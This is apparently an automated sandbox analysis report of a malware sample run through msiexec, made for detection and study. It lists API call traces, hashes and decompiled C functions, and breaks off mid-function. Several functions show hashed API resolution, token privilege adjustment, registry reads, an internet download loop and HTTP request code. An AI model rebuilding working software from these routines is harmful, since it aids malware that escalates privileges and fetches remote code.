GetModuleHandleA.KERNEL32(00A4CB9C,?,00A36F6A), ref: 00A386DF
__mtterm.LIBCMT ref: 00A386EB

Part of subcall function 00A383C3: __decode_pointer.LIBCMT ref: 00A383D4
Part of subcall function 00A383C3: TlsFree.KERNEL32(00A4F0B8,00A37006), ref: 00A383EE

TlsAlloc.KERNEL32 ref: 00A38778
__init_pointers.LIBCMT ref: 00A3879D
__encode_pointer.LIBCMT ref: 00A387A8
__encode_pointer.LIBCMT ref: 00A387B8
__encode_pointer.LIBCMT ref: 00A387C8
__encode_pointer.LIBCMT ref: 00A387D8
__decode_pointer.LIBCMT ref: 00A387F9
__calloc_crt.LIBCMT ref: 00A38812
__decode_pointer.LIBCMT ref: 00A3882C
GetCurrentThreadId.KERNEL32 ref: 00A38842

Memory Dump Source

Source File: 00000003.00000002.2154529687.0000000000996000.00000020.00020000.sdmp, Offset: 00996000, based on PE: false

Similarity

API ID: __encode_pointer$__decode_pointer$AllocCurrentFreeHandleModuleThread__calloc_crt__init_pointers__mtterm
String ID:
API String ID: 802150526-0
Opcode ID: 2df2aa42dc2df16f50868e05230a24277fd0e9e0277f74843974021ecc7f8ccf
Instruction ID: 0d5c0588e52270d8abf4b7f513760c78da52644f9e024637fdbc96f3e40e9f94
Opcode Fuzzy Hash: 2df2aa42dc2df16f50868e05230a24277fd0e9e0277f74843974021ecc7f8ccf
Instruction Fuzzy Hash: 1C31637A5823049ACB10EFF4BD06A173FB1EBC9760F10492AF520971A1DFB995429F60

Uniqueness

Uniqueness Score: -1.00%

Function 00A3885D, Relevance: 7.5, APIs: 5, Instructions: 44memoryCOMMON

Download Yara Rule

APIs

__lock.LIBCMT ref: 00A3887B

Part of subcall function 00A3B081: __mtinitlocknum.LIBCMT ref: 00A3B095
Part of subcall function 00A3B081: __amsg_exit.LIBCMT ref: 00A3B0A1
Part of subcall function 00A3B081: RtlEnterCriticalSection.NTDLL(?), ref: 00A3B0A9

___sbh_find_block.LIBCMT ref: 00A38886
___sbh_free_block.LIBCMT ref: 00A38895
HeapFree.KERNEL32(00000000,?,00A4DDA8), ref: 00A388C5
GetLastError.KERNEL32(?,00A388F8,?,00000001,?,00A3B00B,00000018,00A4DE68,0000000C,00A3B09A,?,?,?,00A385D2,0000000D,00A4DD80), ref: 00A388D6

Memory Dump Source

Source File: 00000003.00000002.2154529687.0000000000996000.00000020.00020000.sdmp, Offset: 00996000, based on PE: false

Similarity

API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
String ID:
API String ID: 2714421763-0
Opcode ID: b01d3408c0136612570adbd1ba37e0673b48a12efeb03024291a893eb5a7ea42
Instruction ID: db7350ee4d0b07c79916af7111398100818e546d4816dc1ae001aee8201ed3d1
Opcode Fuzzy Hash: b01d3408c0136612570adbd1ba37e0673b48a12efeb03024291a893eb5a7ea42
Instruction Fuzzy Hash: 6B01D632902301EBDB207BF0AD06B5F3B749F917A0F600018F514AA0D1CF7899419B55

Uniqueness

Uniqueness Score: -1.00%

Function 009746E0, Relevance: 6.1, APIs: 4, Instructions: 134
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E009746E0(void* __eax, struct _LUID* _a4, struct HDC__* _a8, long _a12) {
				signed int _v20;
				signed int _t33;
				int _t34;
				signed int _t45;
				struct tagRECT* _t46;
				signed char _t47;
				signed int _t48;
				WCHAR* _t49;
				struct HWND__* _t50;
				signed char _t51;
				signed char _t55;
				signed int _t57;
				signed int _t58;
				signed int _t59;
				signed int _t62;
				struct _LUID* _t63;
				signed int _t64;
				signed int _t71;
				int _t73;
				signed int _t75;
				signed int _t81;
				signed int _t82;
				struct HDC__* _t83;
				signed int _t84;

				_t73 = _a12;
				_t83 = _a8;
				_t45 = _t83 * 0x59;
				_t46 = _t45 ^ 0x000000fa;
				_t47 = _t46 & (_t45 ^ 0x00000023);
				OffsetRect(_t46, _t73, _t73);
				_t55 = _t47 + 0xbd;
				_t57 = (_t55 ^ _t47) + _t47;
				_t48 = _t55;
				_v20 = _t57;
				_t58 = _t57;
				_t75 = (_t58 + _t83) * _t48;
				if(_t83 != _t73 || _t58 >= _a8) {
					_t84 = _t75;
					_t49 = _t48 + _t84;
					_t83 = _t84 + _t49;
					LookupPrivilegeValueW(_t49, _t83, _a4);
					_t59 = _t83 + _t49;
					_t75 = _t59 | _t49;
					_t33 = _t49;
					_t48 = _t83;
					if(_a4 == 0xd9f29025) {
						goto L3;
					}
				} else {
					_t59 = _v20;
					if(_a4 != 0xd9f29025) {
						L7:
						_v20 = _t59;
						if(_t59 != _a12) {
							L11:
							_t34 = _a4;
							_t50 = _t48 + _t34;
							EndDialog(_t50, _t34);
							_t81 = ((_t75 ^ _t50) << 0x10) + 0x3080000 >> 0x10;
							_t62 = _t81 * _t50;
							_t83 = (_t83 * _t62 << 0x10) + 0x2520000 >> 0x10;
							_t33 = _t50;
							_t48 = _t81;
							L12:
							if(_a8 == _a12) {
								_t82 = _t62;
								_t63 = _a4;
								if(_t63 != _a8 && _t33 != _t63) {
									SetTextColor(_t83, _a12);
									_t48 = _t82 & (_t83 - _a8 ^ _t48 ^ 0x000003be | 0x00001000);
								}
							}
							return _t48;
						}
						_t64 = _t75;
						if(_t64 != _a12 || _t64 == _a4) {
							goto L11;
						} else {
							_t62 = _v20;
							goto L12;
						}
					}
					L3:
					if(_a8 != 0xd9f29025) {
						_t71 = _t59;
						if(_t71 == _a8) {
							_t59 = _t71;
						} else {
							_t33 = (_t75 << 0x10) + 0x1c0000 >> 0x10;
							_t51 = _t48 + _t33;
							_t83 = (_t51 << 0x18) + 0x6b000000 >> 0x18;
							_t59 = _t51 * _t83;
							_t48 = _t59 * 0x6c000000 >> 0x18;
						}
					}
				}
			}

0x009746e7
0x009746ea
0x009746ed
0x009746f4
0x009746fa
0x009746ff
0x00974709
0x00974711
0x00974713
0x00974715
0x00974718
0x00974720
0x00974725
0x00974781
0x00974784
0x00974786
0x00974791
0x0097479a
0x0097479f
0x009747a1
0x009747a3
0x009747ab
0x00000000
0x00000000
0x0097472c
0x00974731
0x0097473a
0x009747ad
0x009747ad
0x009747b6
0x009747ca
0x009747ca
0x009747cd
0x009747d1
0x009747e2
0x009747e7
0x009747f9
0x009747fc
0x009747fe
0x00974800
0x00974806
0x00974808
0x0097480a
0x00974810
0x0097481d
0x00974838
0x00974838
0x00974810
0x00974844
0x00974844
0x009747b8
0x009747be
0x00000000
0x009747c5
0x009747c5
0x00000000
0x009747c5
0x009747be
0x0097473c
0x00974743
0x00974745
0x0097474d
0x00974845
0x00974753
0x0097475d
0x00974760
0x0097476d
0x00974773
0x0097477c
0x0097477c
0x0097474d
0x00974743

APIs

OffsetRect.USER32 ref: 009746FF
LookupPrivilegeValueW.ADVAPI32(00000000,-00991D33,?), ref: 00974791
EndDialog.USER32 ref: 009747D1
SetTextColor.GDI32(-02EB1D33,-046F1D33), ref: 0097481D

Memory Dump Source

Source File: 00000003.00000002.2154499347.0000000000971000.00000020.00020000.sdmp, Offset: 00970000, based on PE: true

Associated: 00000003.00000002.2154494949.0000000000970000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.2154515642.0000000000990000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.2154520064.0000000000992000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.2154524821.0000000000995000.00000002.00020000.sdmp Download File

Similarity

API ID: ColorDialogLookupOffsetPrivilegeRectTextValue
String ID:
API String ID: 2289036324-0
Opcode ID: fa224e449e5957a6bd59920420c3a63771338d9202b6e0a6087ec1258dcc0b89
Instruction ID: bd5c33f86c55a57cf5527f30f61b0d83926823e14cdeb4ae4c0b69dc59edc303
Opcode Fuzzy Hash: fa224e449e5957a6bd59920420c3a63771338d9202b6e0a6087ec1258dcc0b89
Instruction Fuzzy Hash: AD410933B005285BDB18CE5CCCE16BF77AEEB95351B56852AE81D9B742C334AD45CAC0

Uniqueness

Uniqueness Score: -1.00%

Function 009729D0, Relevance: 6.1, APIs: 4, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E009729D0(void* __eax, struct HWND__* _a4) {
				int _v20;
				signed int _t14;
				struct HDC__* _t21;
				signed int _t26;
				signed int _t28;
				long _t29;
				void* _t32;
				struct HWND__* _t33;
				signed int _t37;
				signed int _t38;
				struct HDC__* _t40;
				struct HWND__* _t42;
				signed int _t43;
				void* _t44;
				void** _t46;

				_t33 = _a4;
				_t26 = _t33 + (_t33 & 0x00000004);
				_t40 = _t26 * 0x6e;
				DeleteDC(_t40);
				_t14 = _t33 * _t40 * _t26;
				_t42 = _t40 + _t14 ^ 0x00000191;
				if(_t33 == 0x191 || _t42 != _t33) {
					_t2 = (0x00000191 - _t42 & _t33) + 0x383; // 0x514
					SetWindowPos(_t42, _t33, 0x191, _t33, _t33, _t33, 0x191);
					_t14 = (_t2 | 0x00000383) * 0x383;
				}
				_v20 = _t14;
				_t43 = _t42 * _t14;
				_t4 = _t43 + 0x368; // -10017227
				_t28 = _t4 - _t14;
				_t37 = _t28 ^ _t43;
				_t6 = _t43 + 0x368; // -10016355
				_t44 = _t37 + _t6;
				ResetEvent(_t44);
				_t29 = _t28 ^ _t44;
				_t38 = _t37 | _t29;
				_t32 = _t38 & _t44;
				_t7 = _t32 + 0x31; // -10017178
				_t21 = _t7 * _t44;
				_t46 = (_t21 + _t29) * _t38;
				CreateDIBSection(_t21, _t21, _v20, _t46, _t32, _t29);
				return _t46 * _t32;
			}

0x009729d7
0x009729df
0x009729e1
0x009729e5
0x009729f0
0x009729f5
0x00972a01
0x00972a17
0x00972a1f
0x00972a2b
0x00972a2b
0x00972a31
0x00972a34
0x00972a37
0x00972a3d
0x00972a41
0x00972a43
0x00972a43
0x00972a4b
0x00972a51
0x00972a53
0x00972a57
0x00972a59
0x00972a5c
0x00972a62
0x00972a6f
0x00972a81

APIs

DeleteDC.GDI32(-0098DD33), ref: 009729E5
SetWindowPos.USER32(-0098DD33,00977BEC,00000191,00977BEC,00977BEC,00977BEC,00000191), ref: 00972A1F
ResetEvent.KERNEL32(-0098D663,?,00977BEC,-00991FA0,-046F1D33,-00991D33,?,00979287,-00991D33,?,009777A1,00000001,?,-00991D33,?,00976A74), ref: 00972A4B
CreateDIBSection.GDI32(-0098D99A,-0098D99A,-0098D9CB,-0098D663,-0098D9CB,-0098D9CB), ref: 00972A6F

Memory Dump Source

Source File: 00000003.00000002.2154499347.0000000000971000.00000020.00020000.sdmp, Offset: 00970000, based on PE: true

Associated: 00000003.00000002.2154494949.0000000000970000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.2154515642.0000000000990000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.2154520064.0000000000992000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.2154524821.0000000000995000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateDeleteEventResetSectionWindow
String ID:
API String ID: 201249963-0
Opcode ID: de3c11e53f1d55e0c03e284868f5c9825330a17e84295c15b313cbb6da13f423
Instruction ID: d351892e32e86b3bf096fae195cb3cdf2c874a2e82c2df735ea2f809995c82b6
Opcode Fuzzy Hash: de3c11e53f1d55e0c03e284868f5c9825330a17e84295c15b313cbb6da13f423
Instruction Fuzzy Hash: 4111C473B002247FD7248B5ADC89EEBBA5EEBC9710B0A0126F95DDB150D671AF05C6E0

Uniqueness

Uniqueness Score: -1.00%

Function 00A37E85, Relevance: 6.0, APIs: 4, Instructions: 48COMMON

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 00A37EA9

Part of subcall function 00A37CD4: __fltout2.LIBCMT ref: 00A37CFE

__cftog_l.LIBCMT ref: 00A37ECF
__cftoe_l.LIBCMT ref: 00A37F01

Memory Dump Source

Source File: 00000003.00000002.2154529687.0000000000996000.00000020.00020000.sdmp, Offset: 00996000, based on PE: false

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: 7ea3a893bf3bd11cad7cd0372379ff1f7e327c259811a7a92178e9d3a0fb71f7
Instruction ID: a3d516f33e360ffc863959641dd32872b236f80cc07bfbcca462d34d675cf245
Opcode Fuzzy Hash: 7ea3a893bf3bd11cad7cd0372379ff1f7e327c259811a7a92178e9d3a0fb71f7
Instruction Fuzzy Hash: 7A014BB240814ABBCF225F84CC42CEE3F22BF18394F588455FA1858531D736CAB1AB81

Uniqueness

Uniqueness Score: -1.00%

Function 00A3993B, Relevance: 6.0, APIs: 4, Instructions: 47COMMON

Download Yara Rule

APIs

Part of subcall function 00A38537: __getptd_noexit.LIBCMT ref: 00A38538
Part of subcall function 00A38537: __amsg_exit.LIBCMT ref: 00A38545

__amsg_exit.LIBCMT ref: 00A39967
__lock.LIBCMT ref: 00A39977
InterlockedDecrement.KERNEL32(?), ref: 00A39994
InterlockedIncrement.KERNEL32(00A4F598), ref: 00A399BF

Memory Dump Source

Source File: 00000003.00000002.2154529687.0000000000996000.00000020.00020000.sdmp, Offset: 00996000, based on PE: false

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd_noexit__lock
String ID:
API String ID: 2880340415-0
Opcode ID: 7ebe8078d4607afa910d14fa37022bff8349fef8cb2661667212a42c44d55a5f
Instruction ID: 024a27f1994bcc9d23324039b83fedeacdbbc2aa94c6fd7be84fb6bc69676fde
Opcode Fuzzy Hash: 7ebe8078d4607afa910d14fa37022bff8349fef8cb2661667212a42c44d55a5f
Instruction Fuzzy Hash: D101C03A900711ABC720EFA89905B9F7360BF45721F00001DF818672A1CBB5A942CFD2

Uniqueness

Uniqueness Score: -1.00%

Function 00A38400, Relevance: 6.0, APIs: 4, Instructions: 46COMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(00A4CB9C,00A4DD60,0000000C,00A38512,00000000,00000000,?,00A388F8,?,00000001,?,00A3B00B,00000018,00A4DE68,0000000C,00A3B09A), ref: 00A38411
InterlockedIncrement.KERNEL32(00A4F170), ref: 00A3846C
__lock.LIBCMT ref: 00A38474
___addlocaleref.LIBCMT ref: 00A38493

Memory Dump Source

Source File: 00000003.00000002.2154529687.0000000000996000.00000020.00020000.sdmp, Offset: 00996000, based on PE: false

Similarity

API ID: HandleIncrementInterlockedModule___addlocaleref__lock
String ID:
API String ID: 2801583907-0
Opcode ID: 5fcf11d530715e64db8a657a7b691eae9b984c131af38a452714f94642297100
Instruction ID: 94f5e6dca8d3eb76b286a0760c3479b70bb6cdcec78c1be72612d66d10ca5419
Opcode Fuzzy Hash: 5fcf11d530715e64db8a657a7b691eae9b984c131af38a452714f94642297100
Instruction Fuzzy Hash: D1115EB9900701AED760DF79C841B5BBBE0FF84310F10492DF59997691CBB999418F50

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: msiexec.exe PID: 2692 Parent PID: 2484 msiexec.exeCOMMON

Executed Functions

Function 000A9C90, Relevance: 1.6, APIs: 1, Instructions: 107
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E000A9C90(void* __eflags, intOrPtr _a4, signed int _a8) {
				void* _v20;
				intOrPtr _v24;
				struct _TOKEN_PRIVILEGES _v36;
				intOrPtr* _t14;
				intOrPtr* _t15;
				void* _t16;
				void* _t17;
				intOrPtr* _t21;
				void* _t22;
				intOrPtr* _t23;
				void* _t26;
				int _t29;
				intOrPtr* _t30;
				void* _t31;
				void* _t32;
				intOrPtr* _t34;
				signed char _t36;
				signed int _t37;
				signed int _t38;
				void** _t40;
				void* _t46;
				void* _t48;
				void* _t49;

				_t14 = E0009BF50(__eflags, 9, 0xbe1ef6e);
				_t15 = E0009BF50(__eflags, 0, 0x160d384);
				_t48 = _t46 + 0x10;
				_t16 =  *_t15();
				_t40 =  &_v20;
				_t17 =  *_t14(_t16, 0x20, 0, _t40);
				_t57 = _t17;
				if(_t17 != 0) {
					L2:
					_v36.PrivilegeCount = 1;
					_v24 = (_a8 & 0x000000ff) + (_a8 & 0x000000ff);
					_t21 = E0009BF50(_t58, 9, 0xa2414e7);
					_t49 = _t48 + 8;
					_t22 =  *_t21(0, _a4,  &(_v36.Privileges));
					_t59 = _t22;
					if(_t22 == 0) {
						L5:
						_t38 = 0;
						__eflags = 0;
					} else {
						_t26 = E00099D50(0x647400a5);
						E0009BF50(_t59, _t26, E00099D50(0x68f91a9f));
						_t49 = _t49 + 0x10;
						_t29 = AdjustTokenPrivileges(_v20, 0,  &_v36, 0, 0, 0); // executed
						_t60 = _t29;
						if(_t29 == 0) {
							goto L5;
						} else {
							_t30 = E0009BF50(_t60, 0, 0xc702be2);
							_t49 = _t49 + 8;
							_t31 =  *_t30();
							_t61 = _t31;
							_t38 = _t37 & 0xffffff00 | _t31 == 0x00000000;
						}
					}
					_t23 = E0009BF50(_t61, 0, 0xb8e7db5);
					 *_t23(_v20);
				} else {
					_t32 = E00099D50(0x647400a5);
					_t34 = E0009BF50(_t57, _t32, E00099D50(0x6b5f7e12));
					_t36 = E000955C0( *_t34(0xffffffff, 0x20, _t40), 0);
					_t48 = _t48 + 0x18;
					_t58 = _t36 & 0x00000001;
					if((_t36 & 0x00000001) != 0) {
						_t38 = 0;
						__eflags = 0;
					} else {
						goto L2;
					}
				}
				return _t38;
			}

0x000a9ca0
0x000a9cb1
0x000a9cb6
0x000a9cb9
0x000a9cbb
0x000a9cc4
0x000a9cc6
0x000a9cc8
0x000a9d0a
0x000a9d10
0x000a9d1f
0x000a9d29
0x000a9d2e
0x000a9d35
0x000a9d37
0x000a9d39
0x000a9d8e
0x000a9d8e
0x000a9d8e
0x000a9d3b
0x000a9d40
0x000a9d59
0x000a9d5e
0x000a9d70
0x000a9d72
0x000a9d74
0x00000000
0x000a9d76
0x000a9d7d
0x000a9d82
0x000a9d85
0x000a9d87
0x000a9d89
0x000a9d89
0x000a9d74
0x000a9d97
0x000a9da2
0x000a9cca
0x000a9ccf
0x000a9ce8
0x000a9cfa
0x000a9cff
0x000a9d02
0x000a9d04
0x000a9da6
0x000a9da6
0x00000000
0x00000000
0x00000000
0x000a9d04
0x000a9db1

APIs

AdjustTokenPrivileges.KERNELBASE(?,00000000,00000001,00000000,00000000,00000000), ref: 000A9D70

Part of subcall function 0009BF50: LoadLibraryA.KERNEL32(?), ref: 0009C1A1

Memory Dump Source

Source File: 00000004.00000002.2355112096.0000000000090000.00000040.00000001.sdmp, Offset: 00090000, based on PE: true

Similarity

API ID: AdjustLibraryLoadPrivilegesToken
String ID:
API String ID: 1509250347-0
Opcode ID: 8541315563667a3872a3cbdb93962040045fbbbfbf2c1bd2c438475c9d480750
Instruction ID: 20b3f2395e56da2729c00de75a3431a9f906f75f4e13e41830d747d92255f8d0
Opcode Fuzzy Hash: 8541315563667a3872a3cbdb93962040045fbbbfbf2c1bd2c438475c9d480750
Instruction Fuzzy Hash: 0C21D3A2E403153AEF2036F46D13FBE35589B52B25F090034FD18B92C3FA91AA1495B3

Uniqueness

Uniqueness Score: -1.00%

Function 00091AF0, Relevance: 1.6, APIs: 1, Instructions: 100
filenetworkCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E00091AF0(void* _a4, intOrPtr* _a8, intOrPtr _a12, intOrPtr _a16) {
				long _v20;
				char _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _t24;
				void* _t27;
				int _t31;
				signed char _t32;
				intOrPtr* _t33;
				intOrPtr _t38;
				intOrPtr* _t40;
				void* _t41;
				intOrPtr _t42;
				intOrPtr _t43;
				intOrPtr _t50;
				intOrPtr* _t54;
				void* _t55;
				void* _t56;
				void* _t58;

				_t24 = _a12;
				_t50 = _a16;
				_v24 = 0;
				_t48 =  <=  ? _t24 : 0xa00000;
				_t54 = 0;
				_v32 =  <=  ? _t24 : 0xa00000;
				_t63 = _t50;
				if(_t50 == 0) {
					while(1) {
						L2:
						_t6 = _t54 + 0x40000; // 0x40000
						_v20 = 0x40000;
						_t27 = E000AB220(_t64,  &_v24, _t6); // executed
						_t56 = _t55 + 8;
						_t65 = _t27;
						if(_t27 == 0) {
							break;
						}
						E0009BF50(_t65, 0x13, 0x7e90205);
						_t56 = _t56 + 8;
						_t42 = _v24;
						_t31 = InternetReadFile(_a4, _t42 + _t54, _v20,  &_v20); // executed
						if(_t31 == 0) {
							break;
						}
						_v28 = _t42;
						_t43 = _t50;
						_t51 = _v20;
						_t32 = E000955C0(_v20, 0);
						_t58 = _t56 + 8;
						_t67 = _t32 & 0x00000001;
						if((_t32 & 0x00000001) != 0) {
							_t33 = _a8;
							__eflags = _t33;
							if(_t33 == 0) {
								E0009B570(_v28);
								return 1;
							}
							 *_t33 = _v28;
							 *((intOrPtr*)(_t33 + 4)) = _t54;
							return 1;
						}
						_t38 = E000922E0(_t67, _t51 + _t54 + E00099D50(0x6fb39a5e), 0xbc79af2);
						_t56 = _t58 + 0xc;
						if(_t38 > _v32) {
							break;
						}
						_t54 = _t38;
						_t50 = _t43;
						_t64 = _t50;
						if(_t50 != 0) {
							goto L1;
						}
					}
					L8:
					E0009B570(_v24);
					__eflags = 0;
					return 0;
				}
				L1:
				_t40 = E0009BF50(_t63, 0, E00099D50(0x640dea48));
				_t56 = _t56 + 0xc;
				_t41 =  *_t40(_t50, 0);
				_t64 = _t41 - 0x102;
				if(_t41 != 0x102) {
					goto L8;
				}
				goto L2;
			}

0x00091af9
0x00091afc
0x00091b04
0x00091b14
0x00091b17
0x00091b19
0x00091b1c
0x00091b1e
0x00091b48
0x00091b48
0x00091b48
0x00091b4e
0x00091b5a
0x00091b5f
0x00091b62
0x00091b64
0x00000000
0x00000000
0x00091b6d
0x00091b72
0x00091b75
0x00091b86
0x00091b8a
0x00000000
0x00000000
0x00091b8c
0x00091b8f
0x00091b91
0x00091b97
0x00091b9c
0x00091b9f
0x00091ba1
0x00091bed
0x00091bf0
0x00091bf2
0x00091c03
0x00000000
0x00091c0b
0x00091bf7
0x00091bf9
0x00000000
0x00091bfc
0x00091bba
0x00091bbf
0x00091bc5
0x00000000
0x00000000
0x00091bc7
0x00091bc9
0x00091bcb
0x00091bcd
0x00000000
0x00000000
0x00091bd3
0x00091bd8
0x00091bdb
0x00091be3
0x00000000
0x00091be3
0x00091b20
0x00091b30
0x00091b35
0x00091b3b
0x00091b3d
0x00091b42
0x00000000
0x00000000
0x00000000

APIs

InternetReadFile.WININET(?,?,00040000,00040000), ref: 00091B86

Memory Dump Source

Source File: 00000004.00000002.2355112096.0000000000090000.00000040.00000001.sdmp, Offset: 00090000, based on PE: true

Similarity

API ID: FileInternetRead
String ID:
API String ID: 778332206-0
Opcode ID: 22c13b2047189b0d5cd6ca8482aa4257d3de8991516c7abb62b69b6f758b1cd0
Instruction ID: 06d5e3289d26b77ad21ae167c27f9fb4c6f363e623e0b8f0153b37d360c3f5fe
Opcode Fuzzy Hash: 22c13b2047189b0d5cd6ca8482aa4257d3de8991516c7abb62b69b6f758b1cd0
Instruction Fuzzy Hash: 2731D8B6E0020B6BDF10DE94EC42FFF77A6AF51715F150025F804A7242F771A915A7A2

Uniqueness

Uniqueness Score: -1.00%

Function 0009BA60, Relevance: 6.1, APIs: 4, Instructions: 107
registryCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E0009BA60(void* __eax, void* _a4, short* _a8, short* _a12, int* _a16, char** _a20) {
				int _v20;
				signed char _t22;
				long _t24;
				void* _t26;
				long _t29;
				signed char _t30;
				char* _t34;
				long _t36;
				char** _t47;
				int _t49;
				char* _t51;
				void* _t52;
				void* _t54;
				void* _t58;
				void* _t60;

				_push(__eax);
				 *_a20 = 0;
				_t22 = E000A5000(_a20, _t60, 0xffffffff);
				E0009BF50(_t60, 9, 0xda29a27);
				_t54 = _t52 + 0xc;
				_t24 = RegOpenKeyExW(_a4, _a8, 0, (_t22 & 0x000000ff) << 0x00000008 | 0x00000001,  &_a4); // executed
				_t49 = 0xffffffff;
				_t61 = _t24;
				if(_t24 == 0) {
					_t47 = _a20;
					_v20 = 0;
					_t26 = E00099D50(0x647400a5);
					E0009BF50(_t61, _t26, E00099D50(0x64f4976b));
					_t58 = _t54 + 0x10;
					_t29 = RegQueryValueExW(_a4, _a12, 0, _a16, 0,  &_v20); // executed
					_t62 = _t29;
					if(_t29 == 0) {
						_t39 = _v20;
						_t30 = E000955C0(_v20, 0);
						_t58 = _t58 + 8;
						_t49 = 0;
						__eflags = _t30 & 0x00000001;
						if(__eflags == 0) {
							E00091460(__eflags, _t39, 4);
							_t34 = E00098290(_t39 + 4);
							_t58 = _t58 + 0xc;
							__eflags = _t34;
							if(__eflags == 0) {
								goto L2;
							} else {
								_t51 = _t34;
								E0009BF50(__eflags, 9, 0x8097c7);
								_t58 = _t58 + 8;
								_t36 = RegQueryValueExW(_a4, _a12, 0, _a16, _t51,  &_v20); // executed
								__eflags = _t36;
								if(__eflags == 0) {
									 *_t47 = _t51;
									_t49 = _v20;
								} else {
									E0009B570(_t51);
									_t58 = _t58 + 4;
									goto L2;
								}
							}
						}
					} else {
						L2:
						_t49 = 0xffffffff;
					}
					E0009BF50(_t62, 9, 0x3111c69);
					_t54 = _t58 + 8;
					RegCloseKey(_a4); // executed
				}
				return _t49;
			}

0x0009ba66
0x0009ba70
0x0009ba78
0x0009ba90
0x0009ba95
0x0009baa1
0x0009baa3
0x0009baa8
0x0009baaa
0x0009bab0
0x0009bab3
0x0009babf
0x0009bad8
0x0009badd
0x0009baf1
0x0009baf3
0x0009baf5
0x0009bafe
0x0009bb04
0x0009bb09
0x0009bb0c
0x0009bb0e
0x0009bb10
0x0009bb18
0x0009bb21
0x0009bb26
0x0009bb29
0x0009bb2b
0x00000000
0x0009bb2d
0x0009bb2d
0x0009bb36
0x0009bb3b
0x0009bb4e
0x0009bb50
0x0009bb52
0x0009bb5f
0x0009bb61
0x0009bb54
0x0009bb55
0x0009bb5a
0x00000000
0x0009bb5a
0x0009bb52
0x0009bb2b
0x0009baf7
0x0009baf7
0x0009baf7
0x0009baf7
0x0009bb6b
0x0009bb70
0x0009bb76
0x0009bb76
0x0009bb81

APIs

RegOpenKeyExW.KERNEL32(?,?,00000000,?,?), ref: 0009BAA1
RegQueryValueExW.KERNEL32(?,00000000,00000000,?,00000000,00000000), ref: 0009BAF1
RegQueryValueExW.KERNEL32(?,00000000,00000000,?,00000000,00000000), ref: 0009BB4E
RegCloseKey.KERNEL32(?), ref: 0009BB76

Memory Dump Source

Source File: 00000004.00000002.2355112096.0000000000090000.00000040.00000001.sdmp, Offset: 00090000, based on PE: true

Similarity

API ID: QueryValue$CloseOpen
String ID:
API String ID: 1586453840-0
Opcode ID: 2a6ff3dabd2c35c0b0cccf3e072f8f186f02349c4679ea3618167ca5bda10f20
Instruction ID: 9a0d17dbb8a912238e8bee2854659a4a7f8f4338881ce0d476bedb172a3c650d
Opcode Fuzzy Hash: 2a6ff3dabd2c35c0b0cccf3e072f8f186f02349c4679ea3618167ca5bda10f20
Instruction Fuzzy Hash: EE31B3B29002157BEF109E64AD42FFE3658AB15774F090124FD18A62D3F7B1AA1097F2

Uniqueness

Uniqueness Score: -1.00%

Function 000ABAD0, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 188
networkCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E000ABAD0(void* __eflags, void* _a4, char* _a8, char* _a12, void* _a16, long _a20, intOrPtr _a24) {
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				long _v32;
				char* _v36;
				char _v48;
				char _v54;
				char _v65;
				char _v97;
				char _v204;
				intOrPtr _t38;
				void* _t43;
				char* _t47;
				char* _t51;
				void* _t52;
				char* _t57;
				int _t58;
				intOrPtr* _t59;
				intOrPtr* _t61;
				signed char _t65;
				intOrPtr* _t68;
				void* _t72;
				intOrPtr* _t74;
				signed char _t82;
				signed int _t85;
				void* _t99;
				void* _t104;
				void* _t105;
				void* _t107;
				void* _t115;
				void* _t117;
				intOrPtr _t126;

				_t125 = __eflags;
				_t38 = E00093750(_t125, E000920A0(__eflags, _a24, 0xfffffffb), _a24);
				_t126 = _t38;
				_v28 = _t38;
				E000AED80( &_v48, _t126, E0009D0A0( &_v54, "HHb?",  &_v54));
				_v36 = E000AFCF0( &_v48);
				_v32 = 0;
				_t43 = E00099D50(0x647400bf);
				E0009BF50(_t126, _t43, E00099D50(0x6f9f943d));
				_t47 = E0009D0A0( &_v65, 0xb04e6,  &_v65);
				_t90 =  ==  ? 0xb0779 : 0xb07f4;
				_t51 = E0009D0A0( &_v204,  ==  ? 0xb0779 : 0xb07f4,  &_v204);
				_t115 = _t107 + 0x38;
				_t52 = HttpOpenRequestA(_a4, _t51, _a8, _t47, _a12,  &_v36, (0 | _t126 != 0x00000000) << 0x00000017 | 0x8404c700, 0); // executed
				_t104 = 0;
				if(_t52 == 0) {
					L9:
					E000AEC50( &_v48, _t134);
					return _t104;
				}
				_t105 = _a16;
				_t129 = _v28;
				_t99 = _t52;
				if(_v28 != 0) {
					_v20 = 0;
					_v24 = 4;
					_t68 = E0009BF50(_t129, 0x13, 0x85dc001);
					_t115 = _t115 + 8;
					_push( &_v24);
					_push( &_v20);
					_push(0x1f);
					_push(_t99);
					if( *_t68() != 0) {
						_t85 = _v20 ^ 0x00013380 | E00099D50(0x6475332c) & _v20;
						_t131 = _t85;
						_v20 = _t85;
						_t72 = E00099D50(0x647400bf);
						_t74 = E0009BF50(_t85, _t72, E00099D50(0x61c0d6ad));
						_t115 = _t115 + 0x14;
						 *_t74(_t99, 0x1f,  &_v20, 4);
					}
				}
				E0009BF50(_t131, 0x13, 0xb157a91);
				_t57 = E0009D0A0( &_v97, 0xb0880,  &_v97);
				_t117 = _t115 + 0x10;
				_t58 = HttpSendRequestA(_t99, _t57, 0x13, _t105, _a20); // executed
				_t132 = _t58;
				if(_t58 == 0) {
					L8:
